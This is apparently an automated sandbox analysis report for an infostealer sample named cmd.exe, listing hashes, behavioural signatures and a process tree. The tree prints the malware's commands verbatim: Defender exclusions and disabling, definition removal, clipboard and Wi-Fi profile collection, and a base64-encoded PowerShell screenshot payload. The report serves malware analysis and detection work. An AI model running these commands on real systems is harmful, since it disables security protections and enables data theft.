Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 06:44
Behavioral task
behavioral1
Sample
cmd.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
cmd.exe
Resource
win10v2004-20241007-en
General
-
Target
cmd.exe
-
Size
6.8MB
-
MD5
8195a06ffd3a0423e0698dd4d06a0cb9
-
SHA1
afc80695865beea92f665cf1d8b33ebae71f40ac
-
SHA256
b3ce55c72f4e23252235f9698bd6078880ceaca310ba16ee859a5a2d6cc39a92
-
SHA512
69ad1591ca03e9ef764a592a2b21919a60fea0e08e3a11ed3c38f8cf9d065b3d44dddc268186fc1a783339d019559937bb8de97c2ac9f99ee75107a372f3f4a1
-
SSDEEP
98304:YkkwN+MdA5wqMk98MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DoDZDJ1n6hBnLnx:YkV15B6ylnlPzf+JiJCsmFMvcn6hVvl
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1984 powershell.exe 3592 powershell.exe 2168 powershell.exe 4828 powershell.exe 2740 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.execmd.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 1524 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
cmd.exepid process 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe 1360 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 25 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 4020 tasklist.exe 2480 tasklist.exe 3572 tasklist.exe 3936 tasklist.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI42082\python311.dll upx behavioral2/memory/1360-25-0x00007FFB82A20000-0x00007FFB8300A000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI42082\libcrypto-1_1.dll upx behavioral2/memory/1360-33-0x00007FFB9A960000-0x00007FFB9A96F000-memory.dmp upx behavioral2/memory/1360-31-0x00007FFB95AA0000-0x00007FFB95AC3000-memory.dmp upx behavioral2/memory/1360-54-0x00007FFB91FB0000-0x00007FFB91FDD000-memory.dmp upx behavioral2/memory/1360-56-0x00007FFB99600000-0x00007FFB99619000-memory.dmp upx behavioral2/memory/1360-58-0x00007FFB91F80000-0x00007FFB91FA3000-memory.dmp upx behavioral2/memory/1360-60-0x00007FFB82660000-0x00007FFB827CF000-memory.dmp upx behavioral2/memory/1360-62-0x00007FFB91F60000-0x00007FFB91F79000-memory.dmp upx behavioral2/memory/1360-64-0x00007FFB91F50000-0x00007FFB91F5D000-memory.dmp upx behavioral2/memory/1360-66-0x00007FFB92020000-0x00007FFB9204E000-memory.dmp upx behavioral2/memory/1360-74-0x00007FFB82220000-0x00007FFB82595000-memory.dmp upx behavioral2/memory/1360-70-0x00007FFB82A20000-0x00007FFB8300A000-memory.dmp upx behavioral2/memory/1360-79-0x00007FFB91FF0000-0x00007FFB91FFD000-memory.dmp upx behavioral2/memory/1360-78-0x00007FFB91FB0000-0x00007FFB91FDD000-memory.dmp upx behavioral2/memory/1360-76-0x00007FFB92000000-0x00007FFB92014000-memory.dmp upx behavioral2/memory/1360-83-0x00007FFB81950000-0x00007FFB81A6C000-memory.dmp upx behavioral2/memory/1360-72-0x00007FFB825A0000-0x00007FFB82658000-memory.dmp upx behavioral2/memory/1360-71-0x00007FFB95AA0000-0x00007FFB95AC3000-memory.dmp upx behavioral2/memory/1360-86-0x00007FFB91F80000-0x00007FFB91FA3000-memory.dmp upx behavioral2/memory/1360-169-0x00007FFB82660000-0x00007FFB827CF000-memory.dmp upx behavioral2/memory/1360-175-0x00007FFB91F60000-0x00007FFB91F79000-memory.dmp upx behavioral2/memory/1360-263-0x00007FFB92020000-0x00007FFB9204E000-memory.dmp upx behavioral2/memory/1360-276-0x00007FFB825A0000-0x00007FFB82658000-memory.dmp upx behavioral2/memory/1360-298-0x00007FFB82220000-0x00007FFB82595000-memory.dmp upx behavioral2/memory/1360-313-0x00007FFB81950000-0x00007FFB81A6C000-memory.dmp upx behavioral2/memory/1360-305-0x00007FFB82660000-0x00007FFB827CF000-memory.dmp upx behavioral2/memory/1360-299-0x00007FFB82A20000-0x00007FFB8300A000-memory.dmp upx behavioral2/memory/1360-300-0x00007FFB95AA0000-0x00007FFB95AC3000-memory.dmp upx behavioral2/memory/1360-314-0x00007FFB82A20000-0x00007FFB8300A000-memory.dmp upx behavioral2/memory/1360-328-0x00007FFB81950000-0x00007FFB81A6C000-memory.dmp upx behavioral2/memory/1360-339-0x00007FFB825A0000-0x00007FFB82658000-memory.dmp upx behavioral2/memory/1360-338-0x00007FFB92020000-0x00007FFB9204E000-memory.dmp upx behavioral2/memory/1360-337-0x00007FFB91F50000-0x00007FFB91F5D000-memory.dmp upx behavioral2/memory/1360-336-0x00007FFB91F60000-0x00007FFB91F79000-memory.dmp upx behavioral2/memory/1360-335-0x00007FFB82660000-0x00007FFB827CF000-memory.dmp upx behavioral2/memory/1360-334-0x00007FFB91F80000-0x00007FFB91FA3000-memory.dmp upx behavioral2/memory/1360-333-0x00007FFB99600000-0x00007FFB99619000-memory.dmp upx behavioral2/memory/1360-332-0x00007FFB91FB0000-0x00007FFB91FDD000-memory.dmp upx behavioral2/memory/1360-331-0x00007FFB95AA0000-0x00007FFB95AC3000-memory.dmp upx behavioral2/memory/1360-330-0x00007FFB9A960000-0x00007FFB9A96F000-memory.dmp upx behavioral2/memory/1360-329-0x00007FFB82220000-0x00007FFB82595000-memory.dmp upx behavioral2/memory/1360-327-0x00007FFB91FF0000-0x00007FFB91FFD000-memory.dmp upx behavioral2/memory/1360-326-0x00007FFB92000000-0x00007FFB92014000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4828 powershell.exe 4828 powershell.exe 3592 powershell.exe 3592 powershell.exe 2740 powershell.exe 2740 powershell.exe 1828 powershell.exe 1828 powershell.exe 3356 powershell.exe 3356 powershell.exe 4828 powershell.exe 4828 powershell.exe 3592 powershell.exe 3592 powershell.exe 1828 powershell.exe 2740 powershell.exe 3356 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 3600 powershell.exe 3600 powershell.exe 3600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exepowershell.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4020 tasklist.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 3936 tasklist.exe Token: SeDebugPrivilege 3592 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeIncreaseQuotaPrivilege 4260 WMIC.exe Token: SeSecurityPrivilege 4260 WMIC.exe Token: SeTakeOwnershipPrivilege 4260 WMIC.exe Token: SeLoadDriverPrivilege 4260 WMIC.exe Token: SeSystemProfilePrivilege 4260 WMIC.exe Token: SeSystemtimePrivilege 4260 WMIC.exe Token: SeProfSingleProcessPrivilege 4260 WMIC.exe Token: SeIncBasePriorityPrivilege 4260 WMIC.exe Token: SeCreatePagefilePrivilege 4260 WMIC.exe Token: SeBackupPrivilege 4260 WMIC.exe Token: SeRestorePrivilege 4260 WMIC.exe Token: SeShutdownPrivilege 4260 WMIC.exe Token: SeDebugPrivilege 4260 WMIC.exe Token: SeSystemEnvironmentPrivilege 4260 WMIC.exe Token: SeRemoteShutdownPrivilege 4260 WMIC.exe Token: SeUndockPrivilege 4260 WMIC.exe Token: SeManageVolumePrivilege 4260 WMIC.exe Token: 33 4260 WMIC.exe Token: 34 4260 WMIC.exe Token: 35 4260 WMIC.exe Token: 36 4260 WMIC.exe Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 2480 tasklist.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeIncreaseQuotaPrivilege 4260 WMIC.exe Token: SeSecurityPrivilege 4260 WMIC.exe Token: SeTakeOwnershipPrivilege 4260 WMIC.exe Token: SeLoadDriverPrivilege 4260 WMIC.exe Token: SeSystemProfilePrivilege 4260 WMIC.exe Token: SeSystemtimePrivilege 4260 WMIC.exe Token: SeProfSingleProcessPrivilege 4260 WMIC.exe Token: SeIncBasePriorityPrivilege 4260 WMIC.exe Token: SeCreatePagefilePrivilege 4260 WMIC.exe Token: SeBackupPrivilege 4260 WMIC.exe Token: SeRestorePrivilege 4260 WMIC.exe Token: SeShutdownPrivilege 4260 WMIC.exe Token: SeDebugPrivilege 4260 WMIC.exe Token: SeSystemEnvironmentPrivilege 4260 WMIC.exe Token: SeRemoteShutdownPrivilege 4260 WMIC.exe Token: SeUndockPrivilege 4260 WMIC.exe Token: SeManageVolumePrivilege 4260 WMIC.exe Token: 33 4260 WMIC.exe Token: 34 4260 WMIC.exe Token: 35 4260 WMIC.exe Token: 36 4260 WMIC.exe Token: SeDebugPrivilege 3572 tasklist.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 3188 powershell.exe Token: SeIncreaseQuotaPrivilege 2120 WMIC.exe Token: SeSecurityPrivilege 2120 WMIC.exe Token: SeTakeOwnershipPrivilege 2120 WMIC.exe Token: SeLoadDriverPrivilege 2120 WMIC.exe Token: SeSystemProfilePrivilege 2120 WMIC.exe Token: SeSystemtimePrivilege 2120 WMIC.exe Token: SeProfSingleProcessPrivilege 2120 WMIC.exe Token: SeIncBasePriorityPrivilege 2120 WMIC.exe Token: SeCreatePagefilePrivilege 2120 WMIC.exe Token: SeBackupPrivilege 2120 WMIC.exe Token: SeRestorePrivilege 2120 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4208 wrote to memory of 1360 4208 cmd.exe cmd.exe PID 4208 wrote to memory of 1360 4208 cmd.exe cmd.exe PID 1360 wrote to memory of 2136 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 2136 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 1512 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 1512 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 1960 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 1960 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 1920 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 1920 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 4596 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 4596 1360 cmd.exe cmd.exe PID 4596 wrote to memory of 4020 4596 cmd.exe tasklist.exe PID 4596 wrote to memory of 4020 4596 cmd.exe tasklist.exe PID 1920 wrote to memory of 3936 1920 cmd.exe tasklist.exe PID 1920 wrote to memory of 3936 1920 cmd.exe tasklist.exe PID 2136 wrote to memory of 2740 2136 cmd.exe powershell.exe PID 2136 wrote to memory of 2740 2136 cmd.exe powershell.exe PID 1512 wrote to memory of 3592 1512 cmd.exe powershell.exe PID 1512 wrote to memory of 3592 1512 cmd.exe powershell.exe PID 1960 wrote to memory of 4828 1960 cmd.exe powershell.exe PID 1960 wrote to memory of 4828 1960 cmd.exe powershell.exe PID 1360 wrote to memory of 3840 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 3840 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 3436 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 3436 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 4504 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 4504 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 3152 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 3152 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 4468 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 4468 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 888 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 888 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 3252 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 3252 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 668 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 668 1360 cmd.exe cmd.exe PID 3436 wrote to memory of 1828 3436 cmd.exe powershell.exe PID 3436 wrote to memory of 1828 3436 cmd.exe powershell.exe PID 3840 wrote to memory of 4260 3840 cmd.exe WMIC.exe PID 3840 wrote to memory of 4260 3840 cmd.exe WMIC.exe PID 4504 wrote to memory of 2480 4504 cmd.exe tasklist.exe PID 4504 wrote to memory of 2480 4504 cmd.exe tasklist.exe PID 4468 wrote to memory of 4264 4468 cmd.exe netsh.exe PID 4468 wrote to memory of 4264 4468 cmd.exe netsh.exe PID 888 wrote to memory of 4328 888 cmd.exe systeminfo.exe PID 888 wrote to memory of 4328 888 cmd.exe systeminfo.exe PID 3252 wrote to memory of 3356 3252 cmd.exe powershell.exe PID 3252 wrote to memory of 3356 3252 cmd.exe powershell.exe PID 3152 wrote to memory of 736 3152 cmd.exe tree.com PID 3152 wrote to memory of 736 3152 cmd.exe tree.com PID 668 wrote to memory of 1352 668 cmd.exe reg.exe PID 668 wrote to memory of 1352 668 cmd.exe reg.exe PID 1360 wrote to memory of 4108 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 4108 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 980 1360 cmd.exe cmd.exe PID 1360 wrote to memory of 980 1360 cmd.exe cmd.exe PID 4108 wrote to memory of 4752 4108 cmd.exe tree.com PID 4108 wrote to memory of 4752 4108 cmd.exe tree.com PID 1360 wrote to memory of 2972 1360 cmd.exe cvtres.exe PID 1360 wrote to memory of 2972 1360 cmd.exe cvtres.exe PID 1360 wrote to memory of 4852 1360 cmd.exe Conhost.exe PID 1360 wrote to memory of 4852 1360 cmd.exe Conhost.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 4796 attrib.exe 1904 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cmd.exe"C:\Users\Admin\AppData\Local\Temp\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\cmd.exe"C:\Users\Admin\AppData\Local\Temp\cmd.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cmd.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cmd.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3936 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1352
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
